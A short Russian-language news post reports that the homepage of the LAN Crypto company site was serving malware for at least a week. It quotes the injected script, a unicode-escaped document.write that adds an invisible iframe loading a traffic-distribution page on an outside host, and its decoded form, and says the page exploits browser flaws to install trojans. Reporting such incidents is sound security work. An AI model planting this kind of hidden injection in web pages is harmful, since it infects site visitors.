Сайт Lancrypto.ru распространяет опасный троян

image

В течении как минимум недели на сайте компании "ЛАН Крипто" расположен код, который пытается заразить компьютеры пользователей сайта вредоносной программой.

В течении как минимум недели на сайте компании "ЛАН Крипто" расположен код, который пытается заразить компьютеры пользователей сайта вредоносной программой.

Внутри главной страницы сайта www.lancrypto.ru расположен следующий код:

<!-- o65 --><script type="text/javascript">document.write('\u003c\u0069\u0066\u0072\
u0061\u006d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\
u003a\u002f\u002f\u0077\u0077\u0077\u002e\u0074\u0072\u0061\u0066\u0066\u0064\u0073\
u002e\u006e\u0065\u0074\u002f\u0074\u0064\u0073\u002f\u0069\u006e\u0064\u0065\u0078\
u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0030\u0020
\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0030\u003e\u003c\u002f\u0069\u0066\u0072
\u0061\u006d\u0065\u003e')</script><!-- c65 -->


Который пытается загрузить следующий вредоносных код:

<iframe src="http://www.traffds.net/tds/index.php" width=0 height=0></iframe> 


Эксплуатирующий несколько известных уязвимостей в браузерах Microsoft Internet Explorer и Mozilla Firefox. В результате заражения на компьютер пользователя устанавливается несколько троянских программ, которые устанавливают полный контроль над компьютером жертвы.



comments powered by Disqus